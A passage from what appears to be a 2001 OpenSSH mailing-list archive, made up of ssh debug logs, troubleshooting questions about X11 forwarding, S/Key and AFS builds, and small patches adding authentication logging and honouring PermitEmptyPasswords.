wsc33: Reading configuration data /afs/lrz/home/a/a2822ab/.ssh/config wsc33: Applying options for * wsc33: Reading configuration data /usr/local/etc/ssh/config wsc33: Applying options for * wsc33: ssh_connect: getuid 10416 geteuid 0 anon 0 wsc33: Connecting to suntest2 [129.187.10.13] port 222. wsc33: Allocated local port 1013. wsc33: Connection established. wsc33: Remote protocol version 1.5, remote software version OpenSSH_2.9p1 (LRZ) wsc33: Waiting for server public key. wsc33: Received server public key (768 bits) and host key (1024 bits). wsc33: Host 'suntest2' is known and matches the host key. wsc33: Initializing random; seed file /afs/lrz/home/a/a2822ab/.ssh/random_seed wsc33: Encryption type: blowfish wsc33: Sent encrypted session key. wsc33: Installing crc compensation attack detector. wsc33: Received encrypted confirmation. wsc33: Remote: AFS token accepted (afs at lrz-muenchen.de, AFS ID 10416 at lrz-muenchen.de) wsc33: Trying rhosts or /etc/hosts.equiv with RSA host authentication. wsc33: Remote: Accepted by .ssh/shosts. wsc33: Received RSA challenge for host key from server. wsc33: Sending response to host key RSA challenge. wsc33: Remote: Rhosts with RSA host authentication accepted. wsc33: Rhosts or /etc/hosts.equiv with RSA host authentication accepted by server. wsc33: Requesting pty. wsc33: Requesting X11 forwarding with authentication spoofing. wsc33: Requesting shell. wsc33: Entering interactive session. Last login: Mon Jun 18 23:30:31 2001 from wsc33.lrz-muenc Sun Microsystems Inc. SunOS 5.7 Generic October 1998 debug1: PAM establishing creds Command terminated on signal 11. -------------- next part -------------- debug3: Reading output from 'ls -alni /var/log' debug3: Time elapsed: 23 msec debug3: Got 1.93 bytes of entropy from 'ls -alni /var/log' [...] 
debug3: Reading output from 'tail -200 /var/adm/messages' debug3: Time elapsed: 14 msec debug3: Got 0.34 bytes of entropy from 'tail -200 /var/adm/messages' debug1: Seeded RNG with 36 bytes from programs debug1: Seeded RNG with 3 bytes from system calls debug1: sshd version OpenSSH_2.9p1 (LRZ) debug1: private host key: #0 type 0 RSA1 Disabling protocol version 2. Could not load host key debug1: Bind to port 222 on 0.0.0.0. Server listening on 0.0.0.0 port 222. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. Connection from 129.187.10.85 port 1013 debug1: Client protocol version 1.5; client software version 1.2.27 (AFS/KRB.p1, LRZ) debug1: no match: 1.2.27 (AFS/KRB.p1, LRZ) debug1: Local version string SSH-1.5-OpenSSH_2.9p1 (LRZ) debug1: Sent 768 bit server key and 1024 bit host key. debug1: Encryption type: blowfish debug1: Received session key; encryption turned on. debug1: Installing crc compensation attack detector. debug1: Starting up PAM with username "a2822ab" debug3: Trying to reverse map address 129.187.10.85. debug1: PAM setting rhost to "wsc33.lrz-muenchen.de" debug1: Attempting authentication for a2822ab. debug1: Trying rhosts with RSA host authentication for client user a2822ab debug2: auth_rhosts2: clientuser a2822ab hostname wsc33.lrz-muenchen.de ipaddr 129.187.10.85 debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: Rhosts RSA authentication: canonical host wsc33.lrz-muenchen.de debug3: check_host_in_hostfile: filename /usr/local/etc/openssh/known_hosts debug3: check_host_in_hostfile: match line 260 Rhosts with RSA host authentication accepted for a2822ab, a2822ab on wsc33.lrz-muenchen.de. debug1: PAM setting ruser to "a2822ab" Accepted rhosts-rsa for a2822ab from 129.187.10.85 port 1013 ruser a2822ab debug1: session_new: init debug1: session_new: session 0 debug1: Allocating pty. 
debug2: tty_parse_modes: ospeed 9600 debug2: tty_parse_modes: ispeed 9600 debug2: tty_parse_modes: 1 3 [...] debug2: tty_parse_modes: 2 28 debug2: tty_parse_modes: 93 0 debug1: Received request for X11 forwarding with auth spoofing. debug2: SSH_PROTOFLAG_SCREEN_NUMBER: 1 debug1: bind port 6010: Address already in use debug1: bind port 6011: Address already in use debug1: fd 11 setting O_NONBLOCK debug1: fd 11 IS O_NONBLOCK debug1: channel 0: new [X11 inet listener] debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: PAM setting tty to "/dev/pts/10" debug1: PAM establishing creds debug1: Entering interactive session. debug1: fd 6 setting O_NONBLOCK debug1: fd 10 IS O_NONBLOCK debug1: server_init_dispatch_13 debug1: server_init_dispatch_15 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug1: End of interactive session; stdin 0, stdout (read 155, sent 155), stderr 0 bytes. debug1: channel_free: channel 0: status: The following connections are open: debug1: Received SIGCHLD. Disconnecting: Command terminated on signal 11. debug1: Calling cleanup 0x52040(0x0) debug1: xauthfile_cleanup_proc called debug1: Calling cleanup 0x60450(0x0) debug1: Calling cleanup 0x520f8(0x179318) debug1: pty_cleanup_proc: /dev/pts/10 debug1: Calling cleanup 0x47bd0(0x0) debug1: Cannot delete credentials[7]: Permission denied debug1: Calling cleanup 0x6fff8(0x0) debug1: Calling cleanup 0x7b100(0x0) debug1: writing PRNG seed to file //.ssh/prng_seed -------------- next part -------------- $ ssh -v -p 222 suntest2 SSH Version 1.2.27 (AFS/KRB.p1, LRZ) [sparc-sun-solaris2.5.1], protocol version 1.5. Standard version. Does not use RSAREF. 
wsc33: Reading configuration data /afs/lrz/home/a/a2822ab/.ssh/config wsc33: Applying options for * wsc33: Reading configuration data /usr/local/etc/ssh/config wsc33: Applying options for * wsc33: ssh_connect: getuid 10416 geteuid 0 anon 0 wsc33: Connecting to suntest2 [129.187.10.13] port 222. wsc33: Allocated local port 1013. wsc33: Connection established. wsc33: Remote protocol version 1.5, remote software version OpenSSH_2.9p1 (LRZ) wsc33: Waiting for server public key. wsc33: Received server public key (768 bits) and host key (1024 bits). wsc33: Host 'suntest2' is known and matches the host key. wsc33: Initializing random; seed file /afs/lrz/home/a/a2822ab/.ssh/random_seed wsc33: Encryption type: blowfish wsc33: Sent encrypted session key. wsc33: Installing crc compensation attack detector. wsc33: Received encrypted confirmation. wsc33: Remote: AFS token accepted (afs at lrz-muenchen.de, AFS ID 10416 at lrz-muenchen.de) wsc33: Trying rhosts or /etc/hosts.equiv with RSA host authentication. wsc33: Server refused our rhosts authentication or host key. wsc33: No agent. wsc33: Doing password authentication. a2822ab at suntest2's password: wsc33: Requesting pty. wsc33: Requesting X11 forwarding with authentication spoofing. wsc33: Requesting shell. wsc33: Entering interactive session. Last login: Mon Jun 18 23:39:13 2001 from wsc33.lrz-muenc Sun Microsystems Inc. SunOS 5.7 Generic October 1998 debug1: PAM establishing creds Command terminated on signal 11. -------------- next part -------------- debug3: Reading output from 'ls -alni /var/log' debug3: Time elapsed: 23 msec debug3: Got 1.93 bytes of entropy from 'ls -alni /var/log' [...] 
debug3: Reading output from 'tail -200 /var/adm/messages' debug3: Time elapsed: 14 msec debug3: Got 0.44 bytes of entropy from 'tail -200 /var/adm/messages' debug1: Seeded RNG with 36 bytes from programs debug1: Seeded RNG with 3 bytes from system calls debug1: sshd version OpenSSH_2.9p1 (LRZ) debug1: private host key: #0 type 0 RSA1 Disabling protocol version 2. Could not load host key debug1: Bind to port 222 on 0.0.0.0. Server listening on 0.0.0.0 port 222. Generating 768 bit RSA key. RSA key generation complete. debug1: Server will not fork when running in debugging mode. Connection from 129.187.10.85 port 1013 debug1: Client protocol version 1.5; client software version 1.2.27 (AFS/KRB.p1, LRZ) debug1: no match: 1.2.27 (AFS/KRB.p1, LRZ) debug1: Local version string SSH-1.5-OpenSSH_2.9p1 (LRZ) debug1: Sent 768 bit server key and 1024 bit host key. debug1: Encryption type: blowfish debug1: Received session key; encryption turned on. debug1: Installing crc compensation attack detector. debug1: Starting up PAM with username "a2822ab" debug3: Trying to reverse map address 129.187.10.85. debug1: PAM setting rhost to "wsc33.lrz-muenchen.de" debug1: Attempting authentication for a2822ab. debug1: Trying rhosts with RSA host authentication for client user a2822ab debug2: auth_rhosts2: clientuser a2822ab hostname wsc33.lrz-muenchen.de ipaddr 129.187.10.85 debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid Failed rhosts-rsa for a2822ab from 129.187.10.85 port 1013 ruser a2822ab debug1: writing PRNG seed to file //.ssh/prng_seed debug1: PAM Password authentication accepted for user "a2822ab" Accepted password for a2822ab from 129.187.10.85 port 1013 debug1: session_new: init debug1: session_new: session 0 debug1: Allocating pty. debug2: tty_parse_modes: ospeed 9600 debug2: tty_parse_modes: ispeed 9600 debug2: tty_parse_modes: 1 3 [...] 
debug2: tty_parse_modes: 93 0 debug1: Received request for X11 forwarding with auth spoofing. debug2: SSH_PROTOFLAG_SCREEN_NUMBER: 1 debug1: bind port 6010: Address already in use debug1: bind port 6011: Address already in use debug1: fd 11 setting O_NONBLOCK debug1: fd 11 IS O_NONBLOCK debug1: channel 0: new [X11 inet listener] debug1: temporarily_use_uid: 10416/1052 (e=0) debug1: restore_uid debug1: PAM setting tty to "/dev/pts/10" debug1: PAM establishing creds debug1: Entering interactive session. debug1: fd 6 setting O_NONBLOCK debug1: fd 10 IS O_NONBLOCK debug1: server_init_dispatch_13 debug1: server_init_dispatch_15 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug3: tvp!=NULL kid 0 mili 10 debug1: End of interactive session; stdin 0, stdout (read 155, sent 155), stderr 0 bytes. debug1: channel_free: channel 0: status: The following connections are open: debug1: Received SIGCHLD. Disconnecting: Command terminated on signal 11. debug1: Calling cleanup 0x52040(0x0) debug1: xauthfile_cleanup_proc called debug1: Calling cleanup 0x60450(0x0) debug1: Calling cleanup 0x520f8(0x179318) debug1: pty_cleanup_proc: /dev/pts/10 debug1: Calling cleanup 0x47bd0(0x0) debug1: Cannot delete credentials[7]: Permission denied debug1: Calling cleanup 0x6fff8(0x0) debug1: Calling cleanup 0x7b100(0x0) debug1: writing PRNG seed to file //.ssh/prng_seed From acox at ia.primustel.com Tue Jun 19 09:05:10 2001 
From: acox at ia.primustel.com (Aran Cox)
Date: Mon, 18 Jun 2001 18:05:10 -0500
Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2
In-Reply-To: <20010613163006.A1374@benway.cv.telegroup.com>; from acox@ia.primustel.com on Wed, Jun 13, 2001 at 04:30:06PM -0500
References: <20010613163006.A1374@benway.cv.telegroup.com>
Message-ID: <20010618180510.A31297@benway.cv.telegroup.com>

Well, I almost solved my problem but caused another. I downloaded today's snapshot and compiled that for linux. Now no X applications make it back:

Xlib: connection to "cvcdr1b.cv.telegroup.com:10.0" refused by server
Xlib: Invalid MIT-MAGIC-COOKIE-1 key
Error: Can't open display: cvcdr1b.cv.telegroup.com:10.0

If I do an xhost +localhost, everything works perfectly. But I don't really want to do an xhost +localhost on my machine, and I didn't have to before.

Any suggestions?

On Wed, Jun 13, 2001 at 04:30:06PM -0500, Aran Cox wrote:
> When I run this command:
>
> ssh -1 -v -n -l root njdb1b /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc
>
> An xterm appears on my screen, the contents of /etc scroll by and then ssh exits.
>
> When I invoke the same command with the -2 option, the xterm appears (and disappears) but
> ssh never exits. netstat says the (ssh) connection is still established but the xterm
> is no longer running.
>
> I'll include the output as attachments. Any idea as to what is going on?
>
> The client is RedHat 7.1 using RPMS from the openbsd.com ftp site. The server
> is SCO OpenServer 5.0.5 built with the SCO development environment.
I configured > with : > > export CCFLAGS='-L/usr/local/lib -I/usr/local/include' > ./configure --sysconfdir=/etc/ssh --with-rsh=/usr/bin/rcmd --exec-prefix=/usr > > > Thanks, Aran > > Content-Description: protocol1.txt > OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f > debug1: Reading configuration data /home/spin/.ssh/config > debug1: Applying options for * > debug1: Applying options for njdb* > debug1: Reading configuration data /etc/ssh/ssh_config > debug1: Applying options for * > debug1: Seeding random number generator > debug1: Rhosts Authentication disabled, originating port will not be trusted. > debug1: restore_uid > debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 > debug1: Connecting to njdb1b [X.X.X.X] port 22. > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: Connection established. > debug1: read PEM private key done: type DSA > debug1: read PEM private key done: type RSA > debug1: identity file /home/spin/.ssh/identity type 0 > debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 > debug1: match: OpenSSH_2.9p1 pat ^OpenSSH > debug1: Local version string SSH-1.5-OpenSSH_2.9p1 > debug1: Waiting for server public key. > debug1: Received server public key (768 bits) and host key (1024 bits). > debug1: Host 'njdb1b' is known and matches the RSA1 host key. > debug1: Found key in /home/spin/.ssh/known_hosts:3 > debug1: Encryption type: blowfish > debug1: Sent encrypted session key. > debug1: Installing crc compensation attack detector. > debug1: Received encrypted confirmation. > debug1: Trying RSA authentication via agent with 'spin at benway' > debug1: Received RSA challenge from server. > debug1: Sending response to RSA challenge. > debug1: Remote: RSA authentication accepted. > debug1: RSA authentication accepted by server. > debug1: Requesting X11 forwarding with authentication spoofing. 
> debug1: Requesting authentication agent forwarding. > debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc > debug1: Entering interactive session. > debug1: Sending eof. > debug1: Received X11 open request. > debug1: fd 4 setting O_NONBLOCK > debug1: fd 4 IS O_NONBLOCK > debug1: channel 0: new [X11 connection from X.X.X.X port 1482] > debug1: channel 0: rcvd ieof > debug1: channel 0: output open -> drain > debug1: channel 0: obuf empty > debug1: channel 0: output drain -> closed > debug1: channel 0: send oclose > debug1: channel 0: close_write > debug1: channel 0: read<=0 rfd 4 len 0 > debug1: channel 0: read failed > debug1: channel 0: input open -> drain > debug1: channel 0: close_read > debug1: channel 0: input: no drain shortcut > debug1: channel 0: ibuf empty > debug1: channel 0: input drain -> wait_oclose > debug1: channel 0: send ieof > debug1: channel 0: rcvd oclose > debug1: channel 0: input wait_oclose -> closed > debug1: channel 0: is dead > debug1: channel_free: channel 0: status: The following connections are open: > #0 X11 connection from X.X.X.X port 1482 (t4 r2 i8/0 o128/0 fd 4/4) > > Waiting for forwarded connections to terminate... > The following connections are open: > #2 X11 connection from X.X.X.X port 1482 (t4 r0 i4/0 o16/0 fd 8/8) > debug1: Transferred: stdin 0, stdout 0, stderr 164 bytes in 1.7 seconds > debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 96.3 > debug1: Exit status 0 Content-Description: protocol2.txt > OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f > debug1: Reading configuration data /home/spin/.ssh/config > debug1: Applying options for * > debug1: Applying options for njdb* > debug1: Reading configuration data /etc/ssh/ssh_config > debug1: Applying options for * > debug1: Seeding random number generator > debug1: Rhosts Authentication disabled, originating port will not be trusted. 
> debug1: restore_uid > debug1: ssh_connect: getuid 1000 geteuid 0 anon 1 > debug1: Connecting to njdb1b [X.X.X.X] port 22. > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: temporarily_use_uid: 1000/100 (e=0) > debug1: restore_uid > debug1: Connection established. > debug1: read PEM private key done: type DSA > debug1: read PEM private key done: type RSA > debug1: identity file /home/spin/.ssh/id_rsa type 1 > debug1: identity file /home/spin/.ssh/id_dsa type -1 > debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 > debug1: match: OpenSSH_2.9p1 pat ^OpenSSH > Enabling compatibility mode for protocol 2.0 > debug1: Local version string SSH-2.0-OpenSSH_2.9p1 > debug1: SSH2_MSG_KEXINIT sent > debug1: SSH2_MSG_KEXINIT received > debug1: kex: server->client blowfish-cbc hmac-md5 none > debug1: kex: client->server blowfish-cbc hmac-md5 none > debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent > debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP > debug1: dh_gen_key: priv key bits set: 139/256 > debug1: bits set: 1040/2049 > debug1: SSH2_MSG_KEX_DH_GEX_INIT sent > debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY > debug1: Host 'njdb1b' is known and matches the RSA host key. > debug1: Found key in /home/spin/.ssh/known_hosts2:11 > debug1: bits set: 1063/2049 > debug1: ssh_rsa_verify: signature correct > debug1: kex_derive_keys > debug1: newkeys: mode 1 > debug1: SSH2_MSG_NEWKEYS sent > debug1: waiting for SSH2_MSG_NEWKEYS > debug1: newkeys: mode 0 > debug1: SSH2_MSG_NEWKEYS received > debug1: done: ssh_kex2. 
> debug1: send SSH2_MSG_SERVICE_REQUEST > debug1: service_accept: ssh-userauth > debug1: got SSH2_MSG_SERVICE_ACCEPT > debug1: authentications that can continue: publickey,password,keyboard-interactive > debug1: next auth method to try is publickey > debug1: userauth_pubkey_agent: testing agent key /home/spin/.ssh/id_rsa > debug1: input_userauth_pk_ok: pkalg ssh-rsa blen 149 lastkey 0x80920e0 hint -1 > debug1: ssh-userauth2 successful: method publickey > debug1: fd 4 setting O_NONBLOCK > debug1: channel 0: new [client-session] > debug1: channel_new: 0 > debug1: send channel open 0 > debug1: Entering interactive session. > debug1: client_init id 0 arg 0 > debug1: Requesting X11 forwarding with authentication spoofing. > debug1: Requesting authentication agent forwarding. > debug1: Sending command: /usr/bin/X11/xterm -sb -sl 1000 -T njdb1b -e find /etc > debug1: channel 0: open confirm rwindow 0 rmax 16384 > debug1: client_input_channel_open: ctype x11 rchan 3 win 4096 max 2048 > debug1: client_request_x11: request from X.X.X.X 1485 > debug1: fd 7 setting O_NONBLOCK > debug1: fd 7 IS O_NONBLOCK > debug1: channel 1: new [x11] > debug1: confirm x11 > debug1: channel 0: read<=0 rfd 4 len 0 > debug1: channel 0: read failed > debug1: channel 0: input open -> drain > debug1: channel 0: close_read > debug1: channel 0: input: no drain shortcut > debug1: channel 0: ibuf empty > debug1: channel 0: input drain -> closed > debug1: channel 0: send eof > debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 > debug1: channel 0: rcvd eof > debug1: channel 0: output open -> drain > debug1: channel 0: rcvd close > debug1: channel 1: rcvd eof > debug1: channel 1: output open -> drain > debug1: channel 0: obuf empty > debug1: channel 0: output drain -> closed > debug1: channel 0: close_write > debug1: channel 0: send close > debug1: channel 0: is dead > debug1: channel_free: channel 0: status: The following connections are open: > #0 client-session (t4 r0 i8/0 o128/0 fd 
-1/-1)
> #1 x11 (t4 r3 i1/0 o32/0 fd 7/7)
>
> debug1: channel_free: channel 0: dettaching channel user
> debug1: channel 1: obuf empty
> debug1: channel 1: output drain -> closed
> debug1: channel 1: close_write
> debug1: channel 1: read<=0 rfd 7 len 0
> debug1: channel 1: read failed
> debug1: channel 1: input open -> drain
> debug1: channel 1: close_read
> debug1: channel 1: input: no drain shortcut
> debug1: channel 1: ibuf empty
> debug1: channel 1: input drain -> closed
> debug1: channel 1: send eof
> debug1: channel 1: send close
> debug1: channel 1: rcvd close
> debug1: channel 1: is dead
> debug1: channel_free: channel 1: status: The following connections are open:
> #1 x11 (t4 r3 i8/0 o128/0 fd 7/7)

From ruf at tik.ee.ethz.ch Tue Jun 19 17:48:19 2001
From: ruf at tik.ee.ethz.ch (Lukas Ruf)
Date: Tue, 19 Jun 2001 09:48:19 +0200
Subject: Public Key for verification of tar balls
Message-ID: <20010619094819.F27881@tik.ee.ethz.ch>

Dear all,

maybe I am blind but I could not find the official distribution public key for OpenSSH 2.9p2

uccellina:~!233> gpgv openssh-2.9p2.tar.gz.sig
gpgv: Signature made Sun Jun 17 06:20:30 2001 MEST using DSA key ID 86FF9C48

If someone can point me to the net of gpg where to find the key -- pardon my ignorance but I cannot find it.

Thanks in advance,
Lukas

From USENBINZ at de.ibm.com Tue Jun 19 17:59:11 2001
From: USENBINZ at de.ibm.com (USENBINZ at de.ibm.com)
Date: Tue, 19 Jun 2001 09:59:11 +0200
Subject: Empty password patch
Message-ID:

For every (successful) ssh-connection we got an additional annoying entry in /var/log/messages like the following:

Jun 19 09:06:57 LIN3135 pam_afs[5913]: AFS Won't use illegal password for user usenbinz

The OpenAFS PAM module posts this message when it is called for authentication with an (disallowed) empty password. The simple patch below checks PermitEmptyPasswords in sshd_config before trying to authenticate with an empty password. This ssh option was previously ignored when PAM accepted empty passwords, but I think it is ok when a ssh option overrules PAM for a ssh connection... Setting PermitEmptyPasswords to yes will result in the old behaviour.

Note that while the patch below is for the CVS version I have only tested the behaviour based on an old openssh 1.2.2 tarball from a Suse 6.4 distribution. I haven't yet figured out why, but the stuff from CVS in openbsd-compat fails to compile miserably on my systems...

=================================================================== RCS file: /cvs/openssh_cvs/auth1.c,v retrieving revision 1.41 diff -u -r1.41 auth1.c --- auth1.c 2001/06/05 18:56:17 1.41 +++ auth1.c 2001/06/19 06:41:35 @@ -83,7 +83,7 @@ authctxt->valid ? "" : "illegal user ", authctxt->user); /* If the user has no password, accept authentication immediately. */ - if (options.password_authentication && + if (options.password_authentication && options.permit_empty_passwd && #ifdef KRB4 (!options.kerberos_authentication || options.kerberos_or_local_passwd) && #endif

From caillat at in2p3.fr Tue Jun 19 19:55:54 2001
From: caillat at in2p3.fr (caillat at in2p3.fr)
Date: Tue, 19 Jun 2001 11:55:54 +0200 (CEST)
Subject: OpenSSH + Solaris + AFS ???
In-Reply-To: <20010618235625.A21297@wsc33.lrz-muenchen.de>
Message-ID: <200106190955.LAA12444@ccdevli2.in2p3.fr>

Hello,

On 18 Jun, Ernst Boetsch wrote:
> I need a working configuration of OpenSSH for Solaris 7 (SunOS 5.7)
> with AFS support. PAM support to use the AFS PAM module `pam_afs.so'
> and TCP-Wrapper support would be nice.
>
> It would be nice to have similar configurations for Solaris 6
> (SunOS 5.6), Solaris 8 (SunOS 5.8) and Solaris 2.5.1.
>

I successfully compiled openssh 2.9p1 for solaris 2.6 and 7, with pam, with kth-krb4 1.0.8, openssl 0.9.6a, zlib 1.1.3, tcp_wrapper, and afs 3.6, with the c compiler from sun workshop 5.

My configure command line was something like:

./configure --prefix=/opt/ssh \
    --with-kerberos4=/opt/krb4 \
    --with-afs=/usr/afsws --with-tcp-wrappers --with-pam \
    --with-ssl-dir=/opt/ssl \
    --with-rsh=/usr/afsws/bin/rsh \
    --with-default-path=/bin:/usr/bin:/opt/ssh/bin \
    --disable-suid-ssh

I had to add a line in includes.h:

#include

before the line:

#include

I also had to remove the first (added by afs or krb libs) -ldes flag in the LIBS variable in the Makefile (there's another -ldes flag added by openssl).

I hope it helps...

Regards,
-- 
Laurent Caillat-Vallet         | Institut National de Physique Nucleaire et de
Tel. +33 (0) 4.78.93.08.80     | Physique des Particules - Centre de Calcul
Fax. +33 (0) 4.72.69.41.70     | http://www.in2p3.fr/CC/

From spc at buy.pl Tue Jun 19 20:37:39 2001
From: spc at buy.pl (spc)
Date: Tue, 19 Jun 2001 12:37:39 +0200
Subject: s/key
Message-ID: <20010619123739.A26004@sigma.buy.pl>

Hello

Can someone tell me how to enable s/key auth via OpenSSH?
I tried to enable ChallengeResponseAuthentication yes in sshd_config
and SkeyAuthentication yes
ChallengeResponseAuthentication yes in ssh_config

As I can read in man:

     -v      Verbose mode. Causes ssh to print debugging messages about its
             progress. This is helpful in debugging connection,
             authentication, and configuration problems. The verbose mode is
             also used to display skey(1) challenges, if the user entered
             "s/key" as password.

But I don't see anything about s/key there.. I tried to enter the s/key password and it doesn't work either. S/key is working properly as I can see in ftp for example.. Any help will be good.

Best Regards

PS: I don't subscribe to this group so please respond directly to me. Thx

K.

From markus.friedl at informatik.uni-erlangen.de Tue Jun 19 22:31:53 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Tue, 19 Jun 2001 14:31:53 +0200
Subject: 2.9p1 SCO OS 5.0.5 server and Linux client hang on exit when using X11 forwarding and protocol 2
In-Reply-To: <20010618180510.A31297@benway.cv.telegroup.com>; from acox@ia.primustel.com on Mon, Jun 18, 2001 at 06:05:10PM -0500
References: <20010613163006.A1374@benway.cv.telegroup.com> <20010618180510.A31297@benway.cv.telegroup.com>
Message-ID: <20010619143153.B22082@folly>

On Mon, Jun 18, 2001 at 06:05:10PM -0500, Aran Cox wrote:
> Well, I almost solved my problem but caused another. I downloaded today's snapshot
> and compiled that for linux. Now no X applications make it back:
>
> Xlib: connection to "cvcdr1b.cv.telegroup.com:10.0" refused by server
> Xlib: Invalid MIT-MAGIC-COOKIE-1 key
> Error: Can't open display: cvcdr1b.cv.telegroup.com:10.0
>
> If I do an xhost +localhost, everything works perfectly. But I don't really
> want to do an xhost +localhost on my machine, and I didn't have to before.
>
> Any suggestions?

try

	DISPLAY=localhost:10.0
	export DISPLAY
	xbiff

does this work?

From markus.friedl at informatik.uni-erlangen.de Tue Jun 19 22:36:14 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Tue, 19 Jun 2001 14:36:14 +0200
Subject: s/key
In-Reply-To: <20010619123739.A26004@sigma.buy.pl>; from spc@buy.pl on Tue, Jun 19, 2001 at 12:37:39PM +0200
References: <20010619123739.A26004@sigma.buy.pl>
Message-ID: <20010619143614.C22082@folly>

On Tue, Jun 19, 2001 at 12:37:39PM +0200, spc wrote:
> Hello
>
> Can someone tell me how to enable s/key auth via OpenSSH?
> I tried to enable ChallengeResponseAuthentication yes in sshd_config
> and SkeyAuthentication yes
> ChallengeResponseAuthentication yes in ssh_config
> As I can read in man:
>      -v      Verbose mode. Causes ssh to print debugging messages about its
>              progress. This is helpful in debugging connection,
>              authentication, and configuration problems. The verbose mode is
>              also used to display skey(1) challenges, if the user entered
>              "s/key" as password.

this is an old manpage.

try:

	ssh -o 'preferredauthentications keyboard-interactive' \
	    -o 'challengeresponseauthentication=yes' \
	    -o 'passwordauthentication=no' host

From dwd at bell-labs.com Tue Jun 19 23:23:10 2001
From: dwd at bell-labs.com (Dave Dykstra)
Date: Tue, 19 Jun 2001 08:23:10 -0500
Subject: Patch for changing expired passwords
In-Reply-To: <20010619143046.A22082@folly>; from markus.friedl@informatik.uni-erlangen.de on Tue, Jun 19, 2001 at 02:30:46PM +0200
References: <20010618155545.A5924@lucent.com> <20010619143046.A22082@folly>
Message-ID: <20010619082309.A17644@lucent.com>

On Tue, Jun 19, 2001 at 02:30:46PM +0200, Markus Friedl wrote:
> On Mon, Jun 18, 2001 at 03:55:45PM -0500, Dave Dykstra wrote:
> > The primary purpose of the attached patches is for portable OpenSSH to
> > support changing expired passwords as specified in shadow password files.
>
> hi, can you provide a
> 	diff -u
> version for me, too :)
>
> thanks.

Sure, sorry about that. I saw somewhere that I should provide unified diffs but I didn't really know what that meant; now I do. The diffs against the two CVS versions are attached.

- Dave Dykstra

-------------- next part --------------
--- auth.c.O Mon Jun 18 09:31:58 2001 +++ auth.c Mon Jun 18 09:35:08 2001
@@ -68,16 +68,25 @@ shell = (pw->pw_shell[0] == '\0') ? _PATH_BSHELL : pw->pw_shell; /* deny if shell does not exists or is not executable */ - if (stat(shell, &st) != 0) + if (stat(shell, &st) != 0) { + log("User %.100s not allowed because shell %.100s does not exist", + pw->pw_name, shell); return 0; - if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) + } + if (!((st.st_mode & S_IFREG) && (st.st_mode & (S_IXOTH|S_IXUSR|S_IXGRP)))) { + log("User %.100s not allowed because shell %.100s is not executable", + pw->pw_name, shell); return 0; + } /* Return false if user is listed in DenyUsers */ if (options.num_deny_users > 0) { for (i = 0; i < options.num_deny_users; i++) - if (match_pattern(pw->pw_name, options.deny_users[i])) + if (match_pattern(pw->pw_name, options.deny_users[i])) { + log("User %.100s not allowed because listed in DenyUsers", + pw->pw_name); return 0; + } } /* Return false if AllowUsers isn't empty and user isn't listed there */ if (options.num_allow_users > 0) { @@ -85,19 +94,27 @@ if (match_pattern(pw->pw_name, options.allow_users[i])) break; /* i < options.num_allow_users iff we break for loop */ - if (i >= options.num_allow_users) + if (i >= options.num_allow_users) { + log("User %.100s not allowed because not listed in AllowUsers", + pw->pw_name); return 0; + } } if (options.num_deny_groups > 0 || options.num_allow_groups > 0) { /* Get the user's group access list (primary and supplementary) */ - if (ga_init(pw->pw_name, pw->pw_gid) == 0) + if (ga_init(pw->pw_name, pw->pw_gid) == 0) { + log("User %.100s not allowed because not in any group", + pw->pw_name); return 0; + } /* Return false if one of user's groups is listed in DenyGroups */ if (options.num_deny_groups > 0) if (ga_match(options.deny_groups, options.num_deny_groups)) { ga_free(); + log("User %.100s not allowed because a group is listed in DenyGroups", + pw->pw_name); return 0; } /* 
@@ -108,6 +125,8 @@ if (!ga_match(options.allow_groups, options.num_allow_groups)) { ga_free(); + log("User %.100s not allowed because none of user's group are listed in AllowGroups", + pw->pw_name); return 0; } ga_free(); --- session.c.O Mon Jun 18 13:59:57 2001 +++ session.c Mon Jun 18 14:15:29 2001 @@ -93,6 +93,7 @@ void session_close(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); +void do_exec(Session *s, const char *command); void do_login(Session *s, const char *command); void do_child(Session *s, const char *command); void do_motd(void); @@ -270,17 +271,7 @@ command = NULL; packet_integrity_check(plen, 0, type); } - if (forced_command != NULL) { - original_command = command; - command = forced_command; - debug("Forced command '%.500s'", forced_command); - } - if (s->ttyfd != -1) - do_exec_pty(s, command); - else - do_exec_no_pty(s, command); - if (command != NULL) - xfree(command); + do_exec(s, command); session_close(s); return; @@ -504,6 +495,35 @@ } } +/* + * This is called to fork and execute a command. If another command is + * to be forced, execute that instead. + */ +void +do_exec(Session *s, const char *command) +{ + if (forced_command) { + original_command = command; + command = forced_command; + forced_command = NULL; + debug("Forced command '%.900s'", command); + } + + if (s->ttyfd != -1) + do_exec_pty(s, command); + else + do_exec_no_pty(s, command); + + if (command != NULL) + xfree(command); + + if (original_command != NULL) { 